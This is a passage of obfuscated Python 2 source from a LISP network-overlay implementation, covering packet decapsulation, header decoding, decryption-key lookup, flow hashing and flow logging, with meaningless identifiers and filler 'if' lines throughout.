ii1i1II = mac_header + self . packet
if 39 - 39: OoooooooOO
if 19 - 19: i11iIiiIii
if 80 - 80: I1IiiI
if 58 - 58: oO0o + I1ii11iIi11i % OoOoOO00
if 22 - 22: iIii1I11I1II1 - Ii1I / I1IiiI * IiII
if 26 - 26: o0oOOo0O0Ooo + OOooOOo - o0oOOo0O0Ooo + Oo0Ooo . oO0o
if 97 - 97: i1IIi
if 46 - 46: I1ii11iIi11i
if 30 - 30: OoO0O00 / O0 * o0oOOo0O0Ooo * I1Ii111 + OoooooooOO * iII111i
if 23 - 23: I11i
if 36 - 36: IiII . iII111i - i1IIi + I1Ii111
l2_socket . write ( ii1i1II )
return
if 54 - 54: OoooooooOO . oO0o - iII111i
if 76 - 76: I1Ii111
def bridge_l2_packet ( self , eid , db ) :
try : O00o0 = db . dynamic_eids [ eid . print_address_no_iid ( ) ]
except : return
try : I1i = lisp_myinterfaces [ O00o0 . interface ]
except : return
try :
socket = I1i . get_bridge_socket ( )
if ( socket == None ) : return
except : return
if 98 - 98: iIii1I11I1II1 + i11iIiiIii * I1ii11iIi11i / I1Ii111 / ooOoO0o - O0
try : socket . send ( self . packet )
except socket . error , o0OoO00 :
lprint ( "bridge_l2_packet(): socket.send() failed: {}" . format ( o0OoO00 ) )
if 42 - 42: iII111i
if 77 - 77: i1IIi * oO0o % OoooooooOO + O0 * ooOoO0o
if 28 - 28: I11i . OoooooooOO * OOooOOo + i11iIiiIii % I1IiiI . iIii1I11I1II1
def is_lisp_packet ( self , packet ) :
O0OO0ooO00 = ( struct . unpack ( "B" , packet [ 9 ] ) [ 0 ] == LISP_UDP_PROTOCOL )
if ( O0OO0ooO00 == False ) : return ( False )
if 63 - 63: II111iiii - I11i . OoOoOO00
IIi1I1iII111 = struct . unpack ( "H" , packet [ 22 : 24 ] ) [ 0 ]
if ( socket . ntohs ( IIi1I1iII111 ) == LISP_DATA_PORT ) : return ( True )
IIi1I1iII111 = struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ]
if ( socket . ntohs ( IIi1I1iII111 ) == LISP_DATA_PORT ) : return ( True )
return ( False )
if 76 - 76: ooOoO0o . oO0o
if 60 - 60: OOooOOo * ooOoO0o * OoO0O00
def decode ( self , is_lisp_packet , lisp_ipc_socket , stats ) :
self . packet_error = ""
ii1i1II = self . packet
O0ooO = len ( ii1i1II )
Iii1iIIIi11I1 = IIII11Ii1I11I = True
if 40 - 40: Ii1I + I1ii11iIi11i * I1Ii111 - oO0o % Ii1I
if 67 - 67: I1ii11iIi11i
if 3 - 3: I1Ii111 . I11i % II111iiii * I1IiiI % i1IIi * OoO0O00
if 5 - 5: II111iiii * i1IIi % Ii1I
oO000O = 0
oOo00Ooo0o0 = 0
if ( is_lisp_packet ) :
oOo00Ooo0o0 = self . lisp_header . get_instance_id ( )
Oo0o0OoOoOo0 = struct . unpack ( "B" , ii1i1II [ 0 : 1 ] ) [ 0 ]
self . outer_version = Oo0o0OoOoOo0 >> 4
if ( self . outer_version == 4 ) :
if 36 - 36: Ii1I * I1IiiI * I1ii11iIi11i . I11i * I1ii11iIi11i
if 76 - 76: OOooOOo + O0 / IiII - OoO0O00
if 27 - 27: Oo0Ooo - iIii1I11I1II1 * iII111i * II111iiii * I1ii11iIi11i
if 9 - 9: i11iIiiIii + OOooOOo - OoOoOO00 / ooOoO0o % i1IIi / oO0o
if 22 - 22: i1IIi
IIIII1II1111 = struct . unpack ( "H" , ii1i1II [ 10 : 12 ] ) [ 0 ]
ii1i1II = lisp_ip_checksum ( ii1i1II )
i1I1iI = struct . unpack ( "H" , ii1i1II [ 10 : 12 ] ) [ 0 ]
if ( i1I1iI != 0 ) :
if ( IIIII1II1111 != 0 or lisp_is_macos ( ) == False ) :
self . packet_error = "checksum-error"
if ( stats ) :
stats [ self . packet_error ] . increment ( O0ooO )
if 99 - 99: Oo0Ooo / I1Ii111 * Oo0Ooo / iIii1I11I1II1 * IiII
if 99 - 99: iIii1I11I1II1 - ooOoO0o
lprint ( "IPv4 header checksum failed for outer header" )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 79 - 79: I1IiiI + oO0o % I11i % oO0o
if 56 - 56: I1ii11iIi11i + oO0o . OoO0O00 + OoooooooOO * I1ii11iIi11i - O0
if 35 - 35: OOooOOo . I11i . I1Ii111 - I11i % I11i + I1Ii111
oO0oO00 = LISP_AFI_IPV4
i1 = 12
self . outer_tos = struct . unpack ( "B" , ii1i1II [ 1 : 2 ] ) [ 0 ]
self . outer_ttl = struct . unpack ( "B" , ii1i1II [ 8 : 9 ] ) [ 0 ]
oO000O = 20
elif ( self . outer_version == 6 ) :
oO0oO00 = LISP_AFI_IPV6
i1 = 8
IiiI1Ii1II = struct . unpack ( "H" , ii1i1II [ 0 : 2 ] ) [ 0 ]
self . outer_tos = ( socket . ntohs ( IiiI1Ii1II ) >> 4 ) & 0xff
self . outer_ttl = struct . unpack ( "B" , ii1i1II [ 7 : 8 ] ) [ 0 ]
oO000O = 40
else :
self . packet_error = "outer-header-error"
if ( stats ) : stats [ self . packet_error ] . increment ( O0ooO )
lprint ( "Cannot decode outer header" )
return ( None )
if 74 - 74: oO0o / OoooooooOO % oO0o / iIii1I11I1II1 + O0
if 95 - 95: Oo0Ooo * OOooOOo + I1IiiI . O0
self . outer_source . afi = oO0oO00
self . outer_dest . afi = oO0oO00
IIiIi1II1IiI = self . outer_source . addr_length ( )
if 99 - 99: Oo0Ooo
self . outer_source . unpack_address ( ii1i1II [ i1 : i1 + IIiIi1II1IiI ] )
i1 += IIiIi1II1IiI
self . outer_dest . unpack_address ( ii1i1II [ i1 : i1 + IIiIi1II1IiI ] )
ii1i1II = ii1i1II [ oO000O : : ]
self . outer_source . mask_len = self . outer_source . host_mask_len ( )
self . outer_dest . mask_len = self . outer_dest . host_mask_len ( )
if 17 - 17: i11iIiiIii - i11iIiiIii + I1ii11iIi11i * ooOoO0o * oO0o / OoooooooOO
if 22 - 22: I1Ii111 * I1ii11iIi11i - IiII
if 71 - 71: iIii1I11I1II1 / i11iIiiIii % o0oOOo0O0Ooo . I1Ii111 * I1IiiI % II111iiii
if 35 - 35: I1Ii111 - OoOoOO00
O00OOOoOOOo0o = struct . unpack ( "H" , ii1i1II [ 0 : 2 ] ) [ 0 ]
self . udp_sport = socket . ntohs ( O00OOOoOOOo0o )
O00OOOoOOOo0o = struct . unpack ( "H" , ii1i1II [ 2 : 4 ] ) [ 0 ]
self . udp_dport = socket . ntohs ( O00OOOoOOOo0o )
O00OOOoOOOo0o = struct . unpack ( "H" , ii1i1II [ 4 : 6 ] ) [ 0 ]
self . udp_length = socket . ntohs ( O00OOOoOOOo0o )
O00OOOoOOOo0o = struct . unpack ( "H" , ii1i1II [ 6 : 8 ] ) [ 0 ]
self . udp_checksum = socket . ntohs ( O00OOOoOOOo0o )
ii1i1II = ii1i1II [ 8 : : ]
if 41 - 41: I1Ii111 * I1Ii111 % I11i
if 84 - 84: o0oOOo0O0Ooo
if 67 - 67: I1ii11iIi11i - o0oOOo0O0Ooo
if 40 - 40: I1IiiI / OoooooooOO + OoO0O00 * OoO0O00
Iii1iIIIi11I1 = ( self . udp_dport == LISP_DATA_PORT or
self . udp_sport == LISP_DATA_PORT )
IIII11Ii1I11I = ( self . udp_dport in ( LISP_L2_DATA_PORT , LISP_VXLAN_DATA_PORT ) )
if 9 - 9: iIii1I11I1II1
if 57 - 57: ooOoO0o / Ii1I % o0oOOo0O0Ooo % i11iIiiIii
if 95 - 95: I1Ii111 - o0oOOo0O0Ooo
if 65 - 65: i11iIiiIii - OoooooooOO / O0 * IiII % I11i
if ( self . lisp_header . decode ( ii1i1II ) == False ) :
self . packet_error = "lisp-header-error"
if ( stats ) : stats [ self . packet_error ] . increment ( O0ooO )
if 53 - 53: OOooOOo + I1Ii111
if ( lisp_flow_logging ) : self . log_flow ( False )
lprint ( "Cannot decode LISP header" )
return ( None )
if 10 - 10: I11i * i1IIi . oO0o / I1Ii111 . OOooOOo / I1Ii111
ii1i1II = ii1i1II [ 8 : : ]
oOo00Ooo0o0 = self . lisp_header . get_instance_id ( )
oO000O += 16
if 1 - 1: iII111i % ooOoO0o
if ( oOo00Ooo0o0 == 0xffffff ) : oOo00Ooo0o0 = 0
if 99 - 99: iII111i + iIii1I11I1II1 . OOooOOo / OoO0O00 * I1ii11iIi11i
if 87 - 87: IiII / II111iiii % OoO0O00 % OoO0O00
if 28 - 28: OoOoOO00 % oO0o - OOooOOo + OOooOOo + oO0o / iIii1I11I1II1
if 91 - 91: I1IiiI / II111iiii * OOooOOo
ooOoo000 = False
o0O = self . lisp_header . k_bits
if ( o0O ) :
oOo0O = lisp_get_crypto_decap_lookup_key ( self . outer_source ,
self . udp_sport )
if ( oOo0O == None ) :
self . packet_error = "no-decrypt-key"
if ( stats ) : stats [ self . packet_error ] . increment ( O0ooO )
if 11 - 11: OoooooooOO % Ii1I
self . print_packet ( "Receive" , is_lisp_packet )
oOoOo00oo = bold ( "No key available" , False )
dprint ( "{} for key-id {} to decrypt packet" . format ( oOoOo00oo , o0O ) )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 32 - 32: I1IiiI * I1Ii111 * i1IIi + oO0o
if 40 - 40: II111iiii
iII1 = lisp_crypto_keys_by_rloc_decap [ oOo0O ] [ o0O ]
if ( iII1 == None ) :
self . packet_error = "no-decrypt-key"
if ( stats ) : stats [ self . packet_error ] . increment ( O0ooO )
if 7 - 7: I1ii11iIi11i - iIii1I11I1II1
self . print_packet ( "Receive" , is_lisp_packet )
oOoOo00oo = bold ( "No key available" , False )
dprint ( "{} to decrypt packet from RLOC {}" . format ( oOoOo00oo ,
red ( oOo0O , False ) ) )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 97 - 97: OOooOOo
if 41 - 41: OoooooooOO - Oo0Ooo * iIii1I11I1II1 . i1IIi
if 39 - 39: Ii1I % i1IIi . I1ii11iIi11i - O0
if 65 - 65: oO0o * oO0o / I11i + oO0o % ooOoO0o + OoOoOO00
if 92 - 92: o0oOOo0O0Ooo
iII1 . use_count += 1
ii1i1II , ooOoo000 = self . decrypt ( ii1i1II , oO000O , iII1 ,
oOo0O )
if ( ooOoo000 == False ) :
if ( stats ) : stats [ self . packet_error ] . increment ( O0ooO )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 37 - 37: oO0o
if 18 - 18: IiII * i11iIiiIii + iIii1I11I1II1 % I11i + i1IIi - OoO0O00
if 85 - 85: OoO0O00 * I11i + OoO0O00
if 39 - 39: Oo0Ooo / i1IIi % i1IIi
if 20 - 20: OOooOOo * oO0o
if 91 - 91: OoO0O00 % i1IIi - iIii1I11I1II1 . OOooOOo
Oo0o0OoOoOo0 = struct . unpack ( "B" , ii1i1II [ 0 : 1 ] ) [ 0 ]
self . inner_version = Oo0o0OoOoOo0 >> 4
if ( Iii1iIIIi11I1 and self . inner_version == 4 and Oo0o0OoOoOo0 >= 0x45 ) :
IIiiIiIIiI1 = socket . ntohs ( struct . unpack ( "H" , ii1i1II [ 2 : 4 ] ) [ 0 ] )
self . inner_tos = struct . unpack ( "B" , ii1i1II [ 1 : 2 ] ) [ 0 ]
self . inner_ttl = struct . unpack ( "B" , ii1i1II [ 8 : 9 ] ) [ 0 ]
self . inner_protocol = struct . unpack ( "B" , ii1i1II [ 9 : 10 ] ) [ 0 ]
self . inner_source . afi = LISP_AFI_IPV4
self . inner_dest . afi = LISP_AFI_IPV4
self . inner_source . unpack_address ( ii1i1II [ 12 : 16 ] )
self . inner_dest . unpack_address ( ii1i1II [ 16 : 20 ] )
i111IiIi1 = socket . ntohs ( struct . unpack ( "H" , ii1i1II [ 6 : 8 ] ) [ 0 ] )
self . inner_is_fragment = ( i111IiIi1 & 0x2000 or i111IiIi1 != 0 )
if ( self . inner_protocol == LISP_UDP_PROTOCOL ) :
self . inner_sport = struct . unpack ( "H" , ii1i1II [ 20 : 22 ] ) [ 0 ]
self . inner_sport = socket . ntohs ( self . inner_sport )
self . inner_dport = struct . unpack ( "H" , ii1i1II [ 22 : 24 ] ) [ 0 ]
self . inner_dport = socket . ntohs ( self . inner_dport )
if 39 - 39: I11i / OoooooooOO - Ii1I + OoO0O00 / OoOoOO00
elif ( Iii1iIIIi11I1 and self . inner_version == 6 and Oo0o0OoOoOo0 >= 0x60 ) :
IIiiIiIIiI1 = socket . ntohs ( struct . unpack ( "H" , ii1i1II [ 4 : 6 ] ) [ 0 ] ) + 40
IiiI1Ii1II = struct . unpack ( "H" , ii1i1II [ 0 : 2 ] ) [ 0 ]
self . inner_tos = ( socket . ntohs ( IiiI1Ii1II ) >> 4 ) & 0xff
self . inner_ttl = struct . unpack ( "B" , ii1i1II [ 7 : 8 ] ) [ 0 ]
self . inner_protocol = struct . unpack ( "B" , ii1i1II [ 6 : 7 ] ) [ 0 ]
self . inner_source . afi = LISP_AFI_IPV6
self . inner_dest . afi = LISP_AFI_IPV6
self . inner_source . unpack_address ( ii1i1II [ 8 : 24 ] )
self . inner_dest . unpack_address ( ii1i1II [ 24 : 40 ] )
if ( self . inner_protocol == LISP_UDP_PROTOCOL ) :
self . inner_sport = struct . unpack ( "H" , ii1i1II [ 40 : 42 ] ) [ 0 ]
self . inner_sport = socket . ntohs ( self . inner_sport )
self . inner_dport = struct . unpack ( "H" , ii1i1II [ 42 : 44 ] ) [ 0 ]
self . inner_dport = socket . ntohs ( self . inner_dport )
if 87 - 87: I1Ii111
elif ( IIII11Ii1I11I ) :
IIiiIiIIiI1 = len ( ii1i1II )
self . inner_tos = 0
self . inner_ttl = 0
self . inner_protocol = 0
self . inner_source . afi = LISP_AFI_MAC
self . inner_dest . afi = LISP_AFI_MAC
self . inner_dest . unpack_address ( self . swap_mac ( ii1i1II [ 0 : 6 ] ) )
self . inner_source . unpack_address ( self . swap_mac ( ii1i1II [ 6 : 12 ] ) )
elif ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( self )
else :
self . packet_error = "bad-inner-version"
if ( stats ) : stats [ self . packet_error ] . increment ( O0ooO )
if 32 - 32: I11i - OOooOOo * O0 % IiII . IiII . I1IiiI
lprint ( "Cannot decode encapsulation, header version {}" . format ( hex ( Oo0o0OoOoOo0 ) ) )
if 91 - 91: i1IIi . iII111i
ii1i1II = lisp_format_packet ( ii1i1II [ 0 : 20 ] )
lprint ( "Packet header: {}" . format ( ii1i1II ) )
if ( lisp_flow_logging and is_lisp_packet ) : self . log_flow ( False )
return ( None )
if 37 - 37: iII111i - I11i + iIii1I11I1II1 / I1Ii111 - OoO0O00 . o0oOOo0O0Ooo
self . inner_source . mask_len = self . inner_source . host_mask_len ( )
self . inner_dest . mask_len = self . inner_dest . host_mask_len ( )
self . inner_source . instance_id = oOo00Ooo0o0
self . inner_dest . instance_id = oOo00Ooo0o0
if 62 - 62: I1ii11iIi11i
if 47 - 47: I1Ii111 % OOooOOo * OoO0O00 . iIii1I11I1II1 % Oo0Ooo + OoooooooOO
if 2 - 2: I1Ii111 % OoooooooOO - ooOoO0o * I1ii11iIi11i * IiII
if 99 - 99: iIii1I11I1II1 . Oo0Ooo / ooOoO0o . OOooOOo % I1IiiI * I11i
if 95 - 95: oO0o
if ( lisp_nonce_echoing and is_lisp_packet ) :
oOo0ooO0O0oo = lisp_get_echo_nonce ( self . outer_source , None )
if ( oOo0ooO0O0oo == None ) :
ii11IiI = self . outer_source . print_address_no_iid ( )
oOo0ooO0O0oo = lisp_echo_nonce ( ii11IiI )
if 14 - 14: I11i - Oo0Ooo . Oo0Ooo * OOooOOo . I1IiiI % iII111i
OO00OO = self . lisp_header . get_nonce ( )
if ( self . lisp_header . is_e_bit_set ( ) ) :
oOo0ooO0O0oo . receive_request ( lisp_ipc_socket , OO00OO )
elif ( oOo0ooO0O0oo . request_nonce_sent ) :
oOo0ooO0O0oo . receive_echo ( lisp_ipc_socket , OO00OO )
if 27 - 27: O0 * I1IiiI - iIii1I11I1II1 - iII111i % O0 . Oo0Ooo
if 16 - 16: IiII % i11iIiiIii . IiII % OoooooooOO - oO0o
if 88 - 88: Ii1I * iIii1I11I1II1 . I11i
if 20 - 20: O0 . i11iIiiIii * i1IIi % O0 . I1IiiI
if 53 - 53: ooOoO0o / OoooooooOO - II111iiii
if 68 - 68: OoooooooOO . OoooooooOO . iIii1I11I1II1 / ooOoO0o - I11i % O0
if 19 - 19: OoooooooOO * oO0o
if ( ooOoo000 ) : self . packet += ii1i1II [ : IIiiIiIIiI1 ]
if 60 - 60: II111iiii - iII111i + o0oOOo0O0Ooo % OOooOOo
if 97 - 97: O0 % O0
if 35 - 35: iII111i - Ii1I . i11iIiiIii % O0 % I1ii11iIi11i
if 92 - 92: OOooOOo % II111iiii . iII111i
if ( lisp_flow_logging and is_lisp_packet ) : self . log_flow ( False )
return ( self )
if 46 - 46: OoOoOO00 + I1IiiI % OoooooooOO * i11iIiiIii - Oo0Ooo
if 47 - 47: iII111i * OoOoOO00 * IiII
def swap_mac ( self , mac ) :
return ( mac [ 1 ] + mac [ 0 ] + mac [ 3 ] + mac [ 2 ] + mac [ 5 ] + mac [ 4 ] )
if 46 - 46: Ii1I
if 42 - 42: iIii1I11I1II1
def strip_outer_headers ( self ) :
i1 = 16
i1 += 20 if ( self . outer_version == 4 ) else 40
self . packet = self . packet [ i1 : : ]
return ( self )
if 32 - 32: Oo0Ooo - Ii1I . OoooooooOO - OoooooooOO - Oo0Ooo . iIii1I11I1II1
if 34 - 34: Oo0Ooo
def hash_ports ( self ) :
ii1i1II = self . packet
Oo0o0OoOoOo0 = self . inner_version
IiI1I1i1 = 0
if ( Oo0o0OoOoOo0 == 4 ) :
Iii11I = struct . unpack ( "B" , ii1i1II [ 9 ] ) [ 0 ]
if ( self . inner_is_fragment ) : return ( Iii11I )
if ( Iii11I in [ 6 , 17 ] ) :
IiI1I1i1 = Iii11I
IiI1I1i1 += struct . unpack ( "I" , ii1i1II [ 20 : 24 ] ) [ 0 ]
IiI1I1i1 = ( IiI1I1i1 >> 16 ) ^ ( IiI1I1i1 & 0xffff )
if 2 - 2: oO0o . OOooOOo
if 43 - 43: iIii1I11I1II1
if ( Oo0o0OoOoOo0 == 6 ) :
Iii11I = struct . unpack ( "B" , ii1i1II [ 6 ] ) [ 0 ]
if ( Iii11I in [ 6 , 17 ] ) :
IiI1I1i1 = Iii11I
IiI1I1i1 += struct . unpack ( "I" , ii1i1II [ 40 : 44 ] ) [ 0 ]
IiI1I1i1 = ( IiI1I1i1 >> 16 ) ^ ( IiI1I1i1 & 0xffff )
if 29 - 29: IiII % ooOoO0o + OoO0O00 . i1IIi + I1IiiI
if 24 - 24: I1Ii111 / Ii1I * I1ii11iIi11i - OoooooooOO / I1IiiI . oO0o
return ( IiI1I1i1 )
if 98 - 98: i1IIi - iII111i
if 49 - 49: o0oOOo0O0Ooo . Ii1I . oO0o
def hash_packet ( self ) :
IiI1I1i1 = self . inner_source . address ^ self . inner_dest . address
IiI1I1i1 += self . hash_ports ( )
if ( self . inner_version == 4 ) :
IiI1I1i1 = ( IiI1I1i1 >> 16 ) ^ ( IiI1I1i1 & 0xffff )
elif ( self . inner_version == 6 ) :
IiI1I1i1 = ( IiI1I1i1 >> 64 ) ^ ( IiI1I1i1 & 0xffffffffffffffff )
IiI1I1i1 = ( IiI1I1i1 >> 32 ) ^ ( IiI1I1i1 & 0xffffffff )
IiI1I1i1 = ( IiI1I1i1 >> 16 ) ^ ( IiI1I1i1 & 0xffff )
if 9 - 9: IiII - II111iiii * OoO0O00
self . udp_sport = 0xf000 | ( IiI1I1i1 & 0xfff )
if 78 - 78: iIii1I11I1II1 / O0 * oO0o / iII111i / OoOoOO00
if 15 - 15: ooOoO0o / oO0o
def print_packet ( self , s_or_r , is_lisp_packet ) :
if ( is_lisp_packet == False ) :
O0Oo00o0o = "{} -> {}" . format ( self . inner_source . print_address ( ) ,
self . inner_dest . print_address ( ) )
dprint ( ( "{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..." ) . format ( bold ( s_or_r , False ) ,
# iII111i + II111iiii . i11iIiiIii . Ii1I - O0
green ( O0Oo00o0o , False ) , self . inner_tos ,
self . inner_ttl , len ( self . packet ) ,
lisp_format_packet ( self . packet [ 0 : 60 ] ) ) )
return
if 47 - 47: oO0o . I1ii11iIi11i - iIii1I11I1II1 % II111iiii / OoOoOO00 % OoooooooOO
if 13 - 13: IiII . Oo0Ooo - I11i / oO0o - Oo0Ooo - I1IiiI
if ( s_or_r . find ( "Receive" ) != - 1 ) :
oOO0o = "decap"
oOO0o += "-vxlan" if self . udp_dport == LISP_VXLAN_DATA_PORT else ""
else :
oOO0o = s_or_r
if ( oOO0o in [ "Send" , "Replicate" ] or oOO0o . find ( "Fragment" ) != - 1 ) :
oOO0o = "encap"
if 72 - 72: O0
if 7 - 7: o0oOOo0O0Ooo
o0OO0OOOOOo = "{} -> {}" . format ( self . outer_source . print_address_no_iid ( ) ,
self . outer_dest . print_address_no_iid ( ) )
if 83 - 83: iIii1I11I1II1 + II111iiii * oO0o / O0 - iII111i
if 23 - 23: i1IIi
if 24 - 24: IiII
if 51 - 51: OOooOOo % i11iIiiIii
if 77 - 77: OOooOOo % i11iIiiIii - I1ii11iIi11i
if ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
I111 = ( "{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + "{}/{}, outer UDP: {} -> {}, " )
if 21 - 21: I11i . Oo0Ooo - OoooooooOO * i1IIi
I111 += bold ( "control-packet" , False ) + ": {} ..."
if 54 - 54: II111iiii % o0oOOo0O0Ooo - i1IIi . I1IiiI - II111iiii / iIii1I11I1II1
dprint ( I111 . format ( bold ( s_or_r , False ) , red ( o0OO0OOOOOo , False ) ,
self . outer_tos , self . outer_ttl , self . udp_sport ,
self . udp_dport , lisp_format_packet ( self . packet [ 0 : 56 ] ) ) )
return
else :
I111 = ( "{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + "{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + "inner tos/ttl: {}/{}, length: {}, {}, packet: {} ..." )
if 29 - 29: oO0o
if 66 - 66: OoooooooOO + iII111i . IiII % i1IIi
if 58 - 58: OOooOOo % iII111i * O0 + I1ii11iIi11i - IiII
if 26 - 26: i1IIi / I1IiiI / I11i + I11i
if ( self . lisp_header . k_bits ) :
if ( oOO0o == "encap" ) : oOO0o = "encrypt/encap"
if ( oOO0o == "decap" ) : oOO0o = "decap/decrypt"
if 46 - 46: I1Ii111 % I1ii11iIi11i + Ii1I
if 67 - 67: iIii1I11I1II1 . i11iIiiIii . i11iIiiIii . i11iIiiIii / I11i + ooOoO0o
O0Oo00o0o = "{} -> {}" . format ( self . inner_source . print_address ( ) ,
self . inner_dest . print_address ( ) )
if 10 - 10: ooOoO0o - Oo0Ooo % II111iiii
dprint ( I111 . format ( bold ( s_or_r , False ) , red ( o0OO0OOOOOo , False ) ,
self . outer_tos , self . outer_ttl , self . udp_sport , self . udp_dport ,
green ( O0Oo00o0o , False ) , self . inner_tos , self . inner_ttl ,
len ( self . packet ) , self . lisp_header . print_header ( oOO0o ) ,
lisp_format_packet ( self . packet [ 0 : 56 ] ) ) )
if 66 - 66: iIii1I11I1II1 . iIii1I11I1II1
if 46 - 46: I1Ii111 * oO0o . Ii1I * I1Ii111 * iIii1I11I1II1 / I11i
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . inner_source , self . inner_dest ) )
if 46 - 46: II111iiii % I1ii11iIi11i . OOooOOo . Oo0Ooo / i11iIiiIii + OoO0O00
if 47 - 47: IiII . OOooOOo
def get_raw_socket ( self ) :
oOo00Ooo0o0 = str ( self . lisp_header . get_instance_id ( ) )
if ( oOo00Ooo0o0 == "0" ) : return ( None )
if ( lisp_iid_to_interface . has_key ( oOo00Ooo0o0 ) == False ) : return ( None )
if 96 - 96: I11i % II111iiii / ooOoO0o % OOooOOo / ooOoO0o % i11iIiiIii
I1i = lisp_iid_to_interface [ oOo00Ooo0o0 ]
o0 = I1i . get_socket ( )
if ( o0 == None ) :
IIIiiiI1Ii1 = bold ( "SO_BINDTODEVICE" , False )
O0000ooO = ( os . getenv ( "LISP_ENFORCE_BINDTODEVICE" ) != None )
lprint ( "{} required for multi-tenancy support, {} packet" . format ( IIIiiiI1Ii1 , "drop" if O0000ooO else "forward" ) )
if 83 - 83: I1Ii111 + o0oOOo0O0Ooo % oO0o / OoO0O00
if ( O0000ooO ) : return ( None )
if 59 - 59: Ii1I * OOooOOo . IiII
if 68 - 68: O0 * iIii1I11I1II1 / I1Ii111
oOo00Ooo0o0 = bold ( oOo00Ooo0o0 , False )
Ii = bold ( I1i . device , False )
dprint ( "Send packet on instance-id {} interface {}" . format ( oOo00Ooo0o0 , Ii ) )
return ( o0 )
if 65 - 65: OOooOOo - I1IiiI * I1Ii111
if 99 - 99: I1IiiI
def log_flow ( self , encap ) :
global lisp_flow_log
if 64 - 64: I1ii11iIi11i * Ii1I * Oo0Ooo % IiII % ooOoO0o
OoO0000O = os . path . exists ( "./log-flows" )
if ( len ( lisp_flow_log ) == LISP_FLOW_LOG_SIZE or OoO0000O ) :
I1I1iI = [ lisp_flow_log ]
lisp_flow_log = [ ]
threading . Thread ( target = lisp_write_flow_log , args = I1I1iI ) . start ( )
if ( OoO0000O ) : os . system ( "rm ./log-flows" )
return
if 41 - 41: oO0o . iII111i + OoooooooOO * Ii1I . o0oOOo0O0Ooo
if 11 - 11: O0
Oo0OO0000oooo = datetime . datetime . now ( )
lisp_flow_log . append ( [ Oo0OO0000oooo , encap , self . packet , self ] )
if 96 - 96: iII111i + o0oOOo0O0Ooo
if 10 - 10: i11iIiiIii . OoooooooOO . O0 % ooOoO0o / OoO0O00
def print_flow ( self , ts , encap , packet ) :
ts = ts . strftime ( "%m/%d/%y %H:%M:%S.%f" ) [ : - 3 ]
iiIiIIIIiI = "{}: {}" . format ( ts , "encap" if encap else "decap" )
if 4 - 4: I11i . IiII
I1I = red ( self . outer_source . print_address_no_iid ( ) , False )
IiiI1II = red ( self . outer_dest . print_address_no_iid ( ) , False )
I1I1i1ii11 = green ( self . inner_source . print_address ( ) , False )
ii = green ( self . inner_dest . print_address ( ) , False )
if 87 - 87: OoO0O00 * OoOoOO00 - Oo0Ooo % OOooOOo * i11iIiiIii
if ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
iiIiIIIIiI += " {}:{} -> {}:{}, LISP control message type {}\n"
iiIiIIIIiI = iiIiIIIIiI . format ( I1I , self . udp_sport , IiiI1II , self . udp_dport ,
self . inner_version )
return ( iiIiIIIIiI )
if 59 - 59: I1Ii111 + OoooooooOO / I1IiiI / OoooooooOO . iII111i
if 20 - 20: Ii1I . I1Ii111 % Ii1I
if ( self . outer_dest . is_null ( ) == False ) :
iiIiIIIIiI += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
iiIiIIIIiI = iiIiIIIIiI . format ( I1I , self . udp_sport , IiiI1II , self . udp_dport ,
len ( packet ) , self . outer_tos , self . outer_ttl )
if 5 - 5: OOooOOo + iII111i
if 23 - 23: I1Ii111 % iIii1I11I1II1 . I11i
if 95 - 95: Oo0Ooo + i11iIiiIii % OOooOOo - oO0o
if 11 - 11: I1ii11iIi11i / O0 + II111iiii
if 95 - 95: I1Ii111 + IiII * iIii1I11I1II1
if ( self . lisp_header . k_bits != 0 ) :
II1Iii1iI = "\n"
if ( self . packet_error != "" ) :
II1Iii1iI = " ({})" . format ( self . packet_error ) + II1Iii1iI
if 56 - 56: iIii1I11I1II1 . I11i
iiIiIIIIiI += ", encrypted" + II1Iii1iI
return ( iiIiIIIIiI )
if 2 - 2: Ii1I
if 12 - 12: i11iIiiIii - iIii1I11I1II1 * IiII * iII111i
if 19 - 19: O0 + oO0o + o0oOOo0O0Ooo
if 81 - 81: iIii1I11I1II1
if 51 - 51: o0oOOo0O0Ooo . I1ii11iIi11i * Ii1I / Oo0Ooo * II111iiii / O0
if ( self . outer_dest . is_null ( ) == False ) :
packet = packet [ 36 : : ] if self . outer_version == 4 else packet [ 56 : : ]
if 44 - 44: i11iIiiIii % I1Ii111 % oO0o + I11i * oO0o . Ii1I
if 89 - 89: OoooooooOO % II111iiii - OoO0O00 % i11iIiiIii
Iii11I = packet [ 9 ] if self . inner_version == 4 else packet [ 6 ]
Iii11I = struct . unpack ( "B" , Iii11I ) [ 0 ]
if 7 - 7: IiII
iiIiIIIIiI += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
iiIiIIIIiI = iiIiIIIIiI . format ( I1I1i1ii11 , ii , len ( packet ) , self . inner_tos ,
self . inner_ttl , Iii11I )
if 15 - 15: Oo0Ooo + iII111i + I1IiiI * o0oOOo0O0Ooo
if 33 - 33: o0oOOo0O0Ooo * Oo0Ooo
if 88 - 88: I1Ii111 % OOooOOo - OoOoOO00 - OoOoOO00 . I1IiiI
if 52 - 52: II111iiii / II111iiii / I1IiiI - I1Ii111
if ( Iii11I in [ 6 , 17 ] ) :
Oo0OOoI1i1i1IIi1I = packet [ 20 : 24 ] if self . inner_version == 4 else packet [ 40 : 44 ]
if ( len ( Oo0OOoI1i1i1IIi1I ) == 4 ) :
Oo0OOoI1i1i1IIi1I = socket . ntohl ( struct . unpack ( "I" , Oo0OOoI1i1i1IIi1I ) [ 0 ] )
iiIiIIIIiI += ", ports {} -> {}" . format ( Oo0OOoI1i1i1IIi1I >> 16 , Oo0OOoI1i1i1IIi1I & 0xffff )
if 18 - 18: oO0o * Ii1I / OoooooooOO % OoOoOO00 - i1IIi
elif ( Iii11I == 1 ) :
iIiIi111 = packet [ 26 : 28 ] if self . inner_version == 4 else packet [ 46 : 48 ]
